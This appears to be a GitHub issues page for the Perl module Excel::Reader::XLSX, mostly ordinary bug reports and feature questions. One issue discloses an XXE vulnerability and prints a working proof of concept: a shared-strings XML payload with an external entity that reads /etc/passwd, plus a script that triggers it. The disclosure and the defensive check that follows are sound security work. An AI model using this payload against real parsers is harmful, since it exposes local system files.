excel-reader-xlsx's People

Contributors

jmcnamara

excel-reader-xlsx's Issues

XXE injection is possible via specially crafted excel file

The module is vulnerable to XXE injection, which allows an attacker to read local files, make network requests, etc.

How to reproduce the issue:

  1. Add an XXE payload to xl/sharedStrings.xml, as in the attached file:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [ <!ELEMENT t ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10" uniqueCount="10"><si><t>&xxe;</t></si><si><t>testA2</t></si><si><t>testA3</t></si><si><t>testA4</t></si><si><t>testA5</t></si><si><t>testB1</t></si><si><t>testB2</t></si><si><t>testB3</t></si><si><t>testB4</t></si><si><t>testB5</t></si></sst>
  2. Run the example from README.md:
use strict;
use warnings;
use Excel::Reader::XLSX;

my $reader = Excel::Reader::XLSX->new();
my $workbook = $reader->read_file( 'test2.xlsx' );

if ( !defined $workbook ) {
    die $reader->error(), "\n";
}

for my $worksheet ( $workbook->worksheets() ) {

    my $sheetname = $worksheet->name();

    print "Sheet = $sheetname\n";

    while ( my $row = $worksheet->next_row() ) {

        while ( my $cell = $row->next_cell() ) {

            my $row   = $cell->row();
            my $col   = $cell->col();
            my $value = $cell->value();

            print "  Cell ($row, $col) = $value\n";
        }
    }
}

As a result, you'll see the content of your local /etc/passwd file.

test2.xlsx
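
One defensive measure, sketched here under stated assumptions, is to refuse any workbook part that carries a DOCTYPE declaration before handing it to the XML parser, since the payload above depends on one. The helper name has_doctype is hypothetical and is not part of Excel::Reader::XLSX. The check is a plain regex on already-decoded text, so it can also flag the string inside a comment or CDATA section.

```perl
use strict;
use warnings;

# Hypothetical helper (not part of Excel::Reader::XLSX): returns 1 if the
# XML text contains a DOCTYPE declaration, 0 otherwise.
# Assumption: $xml is already decoded text, e.g. read from
# xl/sharedStrings.xml after the archive has been extracted.
sub has_doctype {
    my ($xml) = @_;
    return $xml =~ /<!DOCTYPE/i ? 1 : 0;
}

my $payload = '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>'
            . '<sst><si><t>&xxe;</t></si></sst>';
my $benign  = '<sst><si><t>testA2</t></si></sst>';

print "payload rejected\n" if has_doctype($payload);
print "benign accepted\n"  if !has_doctype($benign);
```

The parser options no_network, expand_entities and load_ext_dtd documented by XML::LibXML are another avenue worth evaluating; how they would be wired into this module is not shown in the report.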

Can't locate XML/LibXML/Reader.pm

This is the first time I have used this zip file, and I have a problem with XML/LibXML/Reader.
Can you give me a link to download it?
Thank you very much!
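
XML::LibXML::Reader ships as part of the XML::LibXML distribution on CPAN, so the error usually means that distribution is not installed for the perl in use. A minimal way to check, using a hypothetical helper named module_available:

```perl
use strict;
use warnings;

# Hypothetical helper: returns 1 if the named module can be loaded by the
# current perl, 0 otherwise.
sub module_available {
    my ($module) = @_;
    ( my $file = "$module.pm" ) =~ s{::}{/}g;    # Foo::Bar -> Foo/Bar.pm
    return eval { require $file; 1 } ? 1 : 0;
}

for my $module ( 'XML::LibXML', 'XML::LibXML::Reader' ) {
    printf "%-20s %s\n", $module,
        module_available($module) ? 'found' : 'missing';
}
```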

Sheet index issues

When users rearrange the sheet tabs (removing sheets or changing their order after creation), it throws the XLSX sheet index off in your reader. The following change to Excel::Reader::XLSX::Workbook, lines 123 to 137, fixes that.

Was

my $rel_id   = $node->getAttribute( 'r:id' );

# Use the package relationship data to convert the r:id to a filename.
my $filename = $self->{_rels}->{$rel_id}->{_target};

# Store the properties to set up a Worksheet reader object.
push @{ $self->{_worksheet_properties} },
    {
        _name     => $name,
        _sheet_id => $sheet_id,
        _index    => $sheet_id - 1,
        _rel_id   => $rel_id,
        _filename => $filename,
    };

Could be

my $rel_id   = $node->getAttribute( 'r:id' );

# Derive the index from the numeric part of the r:id.
$rel_id =~ /(\d+)/;
my $index = $1 - 1;

# Use the package relationship data to convert the r:id to a filename.
my $filename = $self->{_rels}->{$rel_id}->{_target};

# Store the properties to set up a Worksheet reader object.
push @{ $self->{_worksheet_properties} },
    {
        _name     => $name,
        _sheet_id => $sheet_id,
        _index    => $index,
        _rel_id   => $rel_id,
        _filename => $filename,
    };
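
To illustrate the difference between the two index calculations, here is a small sketch with made-up sheet data. It assumes a workbook where the second of four sheets was deleted and the r:id values were renumbered contiguously on save, which is what the proposed fix relies on. The helper names and the data are hypothetical.

```perl
use strict;
use warnings;

# Hypothetical <sheet> entries after 'Sheet2' was deleted.
my @sheets = (
    { name => 'Sheet1', sheet_id => 1, rel_id => 'rId1' },
    { name => 'Sheet3', sheet_id => 3, rel_id => 'rId2' },
    { name => 'Sheet4', sheet_id => 4, rel_id => 'rId3' },
);

# Original calculation: index taken from sheetId.
sub index_from_sheet_id {
    my ($sheet) = @_;
    return $sheet->{sheet_id} - 1;
}

# Proposed calculation: index taken from the numeric part of r:id.
# Returns undef if the r:id contains no digits.
sub index_from_rel_id {
    my ($sheet) = @_;
    my ($num) = $sheet->{rel_id} =~ /(\d+)/;
    return defined $num ? $num - 1 : undef;
}

my @old = map { index_from_sheet_id($_) } @sheets;
my @new = map { index_from_rel_id($_) } @sheets;

print "sheetId - 1: @old\n";    # prints "sheetId - 1: 0 2 3"
print "r:id - 1:    @new\n";    # prints "r:id - 1:    0 1 2"
```

With this data the sheetId-based indices have a gap at 1, while the r:id-based indices are contiguous.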

Temp directory not cleaned up

In XLSX.pm, $tempdir is an object, and when you do:

$tempdir .= '/' if $tempdir !~ m{/$};

the result is no longer an object, just a string. The tempdir object you just created is destroyed, so the directory you just created is removed.
When the extractTree() call later recreates the directory, the path is just a string, so the directory never gets cleaned up. You need to make a plain string copy of the object:

my $tmp_dir = "$tempdir";
$tmp_dir .= '/' if $tmp_dir !~ m{/$};

(...then use $tmp_dir as needed but save $tempdir in the excel object).

Of course, it would also be nice to optionally pass in a custom temp directory and custom CLEANUP option to File::Temp->newdir() (not both at the same time, but either/or at any one time).
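
The behaviour described above can be seen in isolation with File::Temp alone. This is a minimal sketch, not the module's code: it keeps the File::Temp->newdir() object alive, works on a plain string copy of the path, and shows that the directory disappears only when the object is released. The variable names are illustrative.

```perl
use strict;
use warnings;
use File::Temp;

# Keep the object: it owns the directory and removes it when destroyed.
my $tempdir = File::Temp->newdir();

# Work on a plain string copy so the object itself is never overwritten.
my $tmp_dir = "$tempdir";
$tmp_dir .= '/' if $tmp_dir !~ m{/$};

my $exists_while_held = -d $tmp_dir ? 1 : 0;

# Releasing the last reference triggers the cleanup.
undef $tempdir;
my $exists_after_release = -d $tmp_dir ? 1 : 0;

print "exists while object is held: $exists_while_held\n";
print "exists after release:        $exists_after_release\n";
```

Had the code appended to $tempdir directly, the object would have been replaced by a string at that point and the directory removed immediately.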

Too many files open

I don't know if there's anything you can do about this, but in a spreadsheet with about 500 worksheets, I get: "IO Error too many files open". I know that each worksheet is in its own file, but I don't know if the file handles are not getting closed as they get read, or if it's necessary to keep that many files open simultaneously, or if the bug is in some other library, etc. I have successfully run Archive::Zip ExtractTree on the file, and it all seems to get extracted OK. Will try to research further unless you beat me to it.

Getting total row count

I actually have two questions:

  1. When will this module go into CPAN, is there any current plan for an initial official release? (I've been using it pretty heavily for at least 6 months now, though just the basic features)

  2. Is there a recommended way to get a total count of rows in a worksheet other than actually iterating through the entire worksheet to count and then iterating again to start parsing values? I looked at possibly using some sort of scan method from XML::LibXML::Reader but nothing really looks appropriate.
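
One possible shortcut for the second question, offered as a sketch rather than a feature of the module: worksheet XML may contain an optional dimension element whose ref attribute gives the used range (for example A1:C500). Assuming that string has been obtained somehow, the row count follows from it. The helper name rows_from_dimension is hypothetical, and the value is only as reliable as the writer of the file made it.

```perl
use strict;
use warnings;

# Hypothetical helper: number of rows spanned by a range reference such as
# 'A1:C500' or a single cell such as 'B2'. Returns undef if the reference
# cannot be parsed.
sub rows_from_dimension {
    my ($ref) = @_;

    # Capture the first row and, if present, the last row. '$' absolute
    # markers are tolerated.
    my ( $first, $last ) =
        $ref =~ /^\$?[A-Z]+\$?(\d+)(?::\$?[A-Z]+\$?(\d+))?$/
        or return;

    $last = $first if !defined $last;
    return $last - $first + 1;
}

print rows_from_dimension('A1:C500'), "\n";    # prints 500
```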

And a compliment:

Great module, extremely useful.

Date types are not handled very elegantly

When I use the module, date types are read in the raw Microsoft Office format (a serial number counting days from an epoch in 1900, or 1904 in workbooks that use the 1904 date system). It would be really helpful if the module provided either the translated date (the DateTime::Format::Excel module is probably a good place to start for that) or a way of determining whether a cell is a date or not (a type method on the cell object or similar).
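
Until something like that exists, a raw value can be converted by hand. The sketch below uses only core modules and assumes the 1900 date system, serial numbers from 1 March 1900 onward, and no time zone handling. The function name is hypothetical; 25569 is the serial number of 1970-01-01 in that system.

```perl
use strict;
use warnings;
use POSIX qw(strftime floor);

# Serial number of 1970-01-01 in the 1900 date system.
use constant EXCEL_UNIX_EPOCH => 25569;

# Hypothetical helper: convert an Excel serial date (1900 date system) to
# an ISO-style UTC timestamp string.
sub excel_serial_to_iso {
    my ($serial) = @_;

    # Days since the Unix epoch, scaled to seconds and rounded.
    my $seconds = floor( ( $serial - EXCEL_UNIX_EPOCH ) * 86400 + 0.5 );

    return strftime( '%Y-%m-%d %H:%M:%S', gmtime($seconds) );
}

print excel_serial_to_iso(41275.5), "\n";    # prints 2013-01-01 12:00:00
```

This does not tell you whether a cell holds a date in the first place; that still requires looking at the cell's number format.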

Required XML::LibXML version

The Makefile.PL requires version 1.89 of XML::LibXML. Just wanted to say that for perl version 5.8.8, I only have XML::LibXML version 1.84, and all tests for Excel::Reader::XLSX pass, so you can probably downgrade this version requirement.

Warnings during test

With perl 5.14.1:
t/regression/workbook/worksheet02.t ..........
Use of qw(...) as parentheses is deprecated at t/regression/workbook/worksheet02.t line 38.
Use of qw(...) as parentheses is deprecated at t/regression/workbook/worksheet02.t line 48.

Did this get undeprecated in a later version?
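
The warning refers to using a bare qw(...) list where Perl expects parentheses, most commonly in a foreach loop. Assuming the test lines use that pattern (the report does not show them), wrapping the list in real parentheses silences the warning on 5.14 and keeps the code compiling on later releases, where the bare form became a syntax error. The sheet names are placeholders.

```perl
use strict;
use warnings;

my @seen;

# Deprecated form (warns on 5.14):
#     for my $name qw(Sheet1 Sheet2 Sheet3) { ... }
# Portable form: put the qw list inside ordinary parentheses.
for my $name ( qw(Sheet1 Sheet2 Sheet3) ) {
    push @seen, $name;
}

print "@seen\n";    # prints "Sheet1 Sheet2 Sheet3"
```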

Looping through a row's cells does not return empty cells

When I loop through a row object's cells it does not return the empty cells which are in between the first populated cell and the last populated cell. This is unlike the call to row->values() which converts the empty cells to an empty string.
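
As a workaround on the caller's side, the gaps can be filled in after the loop. The sketch below is not the module's code: it takes made-up (column, value) pairs, as they might be collected from the cell loop, and returns a dense list running from the first to the last populated column with empty strings in between. The helper name fill_gaps is hypothetical.

```perl
use strict;
use warnings;

# Hypothetical helper: each argument is [ $col, $value ] for a populated
# cell, in ascending column order. Returns the values from the first to the
# last populated column, with '' for the columns in between that had no cell.
sub fill_gaps {
    my (@cells) = @_;
    return () if !@cells;

    my $first = $cells[0][0];
    my $last  = $cells[-1][0];

    my @dense = ('') x ( $last - $first + 1 );
    $dense[ $_->[0] - $first ] = $_->[1] for @cells;

    return @dense;
}

# Populated cells in columns 1 and 4 only.
my @row = fill_gaps( [ 1, 'a' ], [ 4, 'd' ] );
print join( '|', @row ), "\n";    # prints "a|||d"
```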
